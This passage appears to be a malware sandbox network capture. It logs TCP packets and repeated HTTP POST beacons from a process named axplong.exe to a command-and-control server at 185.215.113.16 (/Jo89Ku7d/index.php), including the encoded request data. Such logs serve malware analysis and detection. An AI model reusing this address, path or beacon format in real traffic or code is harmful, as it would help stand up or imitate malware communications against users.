Sep 26, 2024 22:42:51.524097919 CEST	62715	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:51.524771929 CEST	62715	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:51.531363964 CEST	80	62715	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:51.786039114 CEST	80	62715	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:51.786132097 CEST	62715	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:51.888472080 CEST	62715	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:51.888763905 CEST	62716	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:51.893620968 CEST	80	62715	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:51.893697977 CEST	62715	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:51.894047976 CEST	80	62716	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:51.894129038 CEST	62716	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:51.894232035 CEST	62716	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:51.899907112 CEST	80	62716	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:53.581866026 CEST	80	62716	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:53.582020998 CEST	62716	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:53.582782984 CEST	62716	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:53.586107016 CEST	80	62716	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:53.586186886 CEST	62716	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:53.588691950 CEST	80	62716	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:53.588746071 CEST	62716	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:53.589457989 CEST	80	62716	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:53.589514971 CEST	62716	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:53.592768908 CEST	80	62716	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:53.812664032 CEST	80	62716	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:53.812823057 CEST	62716	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:53.919445038 CEST	62716	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:53.919755936 CEST	62717	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:53.924952984 CEST	80	62717	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:53.924978018 CEST	80	62716	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:53.925175905 CEST	62716	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:53.925219059 CEST	62717	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:53.925309896 CEST	62717	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:53.930301905 CEST	80	62717	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:54.624934912 CEST	80	62717	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:54.625045061 CEST	62717	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:54.625822067 CEST	62717	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:54.630770922 CEST	80	62717	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:54.852675915 CEST	80	62717	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:54.852736950 CEST	62717	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:54.966483116 CEST	62717	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:54.966861963 CEST	62718	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:54.971791029 CEST	80	62718	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:54.971890926 CEST	62718	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:54.972063065 CEST	62718	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:54.972404957 CEST	80	62717	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:54.972453117 CEST	62717	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:54.976813078 CEST	80	62718	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:55.693850994 CEST	80	62718	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:55.694016933 CEST	62718	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:55.887156963 CEST	62718	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:55.901554108 CEST	80	62718	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:56.130419016 CEST	80	62718	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:56.130630970 CEST	62718	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:56.231976032 CEST	62718	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:56.232367039 CEST	62719	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:56.237152100 CEST	80	62718	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:56.237209082 CEST	80	62719	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:56.237235069 CEST	62718	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:56.237318039 CEST	62719	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:56.237579107 CEST	62719	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:56.242422104 CEST	80	62719	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:56.957654953 CEST	80	62719	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:56.957798958 CEST	62719	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:56.958610058 CEST	62719	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:56.963634014 CEST	80	62719	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:57.186944962 CEST	80	62719	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:57.187166929 CEST	62719	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:57.294447899 CEST	62719	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:57.294759035 CEST	62720	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:57.299679995 CEST	80	62720	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:57.299801111 CEST	62720	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:57.299981117 CEST	62720	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:57.300282955 CEST	80	62719	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:57.300347090 CEST	62719	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:57.304827929 CEST	80	62720	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:58.011914015 CEST	80	62720	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:58.012109995 CEST	62720	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:58.014436960 CEST	62720	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:58.020318031 CEST	80	62720	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:58.242690086 CEST	80	62720	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:58.242821932 CEST	62720	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:58.357266903 CEST	62720	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:58.357580900 CEST	62721	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:58.362368107 CEST	80	62720	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:58.362468004 CEST	62720	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:58.362584114 CEST	80	62721	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:58.362663984 CEST	62721	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:58.362773895 CEST	62721	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:58.367783070 CEST	80	62721	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:59.068434000 CEST	80	62721	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:59.068526983 CEST	62721	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:59.069276094 CEST	62721	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:59.074126959 CEST	80	62721	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:59.293446064 CEST	80	62721	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:59.293718100 CEST	62721	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:59.404108047 CEST	62721	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:59.404520035 CEST	62722	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:59.409348011 CEST	80	62722	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:59.409451962 CEST	80	62721	185.215.113.16	192.168.2.5
Sep 26, 2024 22:42:59.409641027 CEST	62721	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:59.409682035 CEST	62722	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:59.409925938 CEST	62722	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:42:59.414705038 CEST	80	62722	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:00.101188898 CEST	80	62722	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:00.101370096 CEST	62722	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:00.103750944 CEST	62722	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:00.108608007 CEST	80	62722	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:00.325798988 CEST	80	62722	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:00.325911999 CEST	62722	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:00.435173035 CEST	62722	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:00.435560942 CEST	62723	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:00.440465927 CEST	80	62722	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:00.440506935 CEST	80	62723	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:00.440565109 CEST	62722	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:00.440644979 CEST	62723	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:00.440840006 CEST	62723	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:00.445612907 CEST	80	62723	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:01.140571117 CEST	80	62723	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:01.140669107 CEST	62723	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:01.141330957 CEST	62723	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:01.146156073 CEST	80	62723	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:01.365513086 CEST	80	62723	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:01.365602970 CEST	62723	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:01.482022047 CEST	62723	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:01.482320070 CEST	62724	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:01.487324953 CEST	80	62724	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:01.487468958 CEST	62724	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:01.487586975 CEST	62724	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:01.487618923 CEST	80	62723	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:01.487679958 CEST	62723	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:01.492511988 CEST	80	62724	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:02.199053049 CEST	80	62724	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:02.199131966 CEST	62724	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:02.199703932 CEST	62724	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:02.204618931 CEST	80	62724	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:02.424695015 CEST	80	62724	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:02.424751043 CEST	62724	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:02.595592976 CEST	62724	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:02.596198082 CEST	62725	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:02.601159096 CEST	80	62724	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:02.601226091 CEST	80	62725	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:02.601227045 CEST	62724	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:02.601293087 CEST	62725	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:02.601409912 CEST	62725	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:02.606262922 CEST	80	62725	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:03.310697079 CEST	80	62725	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:03.310869932 CEST	62725	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:03.313441992 CEST	62725	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:03.313922882 CEST	62726	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:03.318490982 CEST	80	62725	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:03.318820000 CEST	80	62726	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:03.318892956 CEST	62725	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:03.318922043 CEST	62726	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:03.319080114 CEST	62726	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:03.323905945 CEST	80	62726	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:04.014354944 CEST	80	62726	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:04.014413118 CEST	62726	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:04.125157118 CEST	62726	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:04.125509977 CEST	62727	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:04.130426884 CEST	80	62727	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:04.130516052 CEST	62727	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:04.130815029 CEST	62727	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:04.130877972 CEST	80	62726	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:04.130930901 CEST	62726	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:04.135704041 CEST	80	62727	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:04.821232080 CEST	80	62727	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:04.821420908 CEST	62727	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:04.824084044 CEST	62727	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:04.824450016 CEST	62728	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:04.829328060 CEST	80	62727	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:04.829381943 CEST	80	62728	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:04.829391003 CEST	62727	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:04.829741001 CEST	62728	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:04.829915047 CEST	62728	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:04.834920883 CEST	80	62728	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:05.556162119 CEST	80	62728	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:05.556252003 CEST	62728	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:05.672200918 CEST	62728	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:05.672807932 CEST	62729	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:05.677357912 CEST	80	62728	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:05.677608013 CEST	62728	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:05.677617073 CEST	80	62729	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:05.677715063 CEST	62729	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:05.677907944 CEST	62729	80	192.168.2.5	185.215.113.16
Sep 26, 2024 22:43:05.683084965 CEST	80	62729	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:06.386079073 CEST	80	62729	185.215.113.16	192.168.2.5
Sep 26, 2024 22:43:06.386389017 CEST	62729	80	192.168.2.5	185.215.113.16

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 26, 2024 22:41:32.285634995 CEST	53	64339	162.159.36.2	192.168.2.5
Sep 26, 2024 22:41:32.811486006 CEST	62526	53	192.168.2.5	1.1.1.1
Sep 26, 2024 22:41:32.821980953 CEST	53	62526	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 26, 2024 22:41:32.811486006 CEST	192.168.2.5	1.1.1.1	0x4657	Standard query (0)	206.23.85.13.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Sep 26, 2024 22:41:32.821980953 CEST	1.1.1.1	192.168.2.5	0x4657	Name error (3)	206.23.85.13.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

185.215.113.16

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	62669	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:02.809284925 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:03.529727936 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:03.532280922 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:03.796063900 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	62670	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:03.909389019 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:04.620893002 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:04.621855021 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:04.849298954 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	62671	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:04.972528934 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:05.704673052 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:05.705491066 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:05.940376997 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	62672	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:06.050055981 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:06.775963068 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:06.776660919 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:07.014902115 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	62673	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 22:42:07.128082991 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 22:42:07.877765894 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 22:42:07.878598928 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 45 46 44 41 34 34 34 43 39 46 38 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CEFDA444C9F8FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Sep 26, 2024 22:42:08.105499983 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 20:42:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	62674	185.215.113.16	80	7620	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
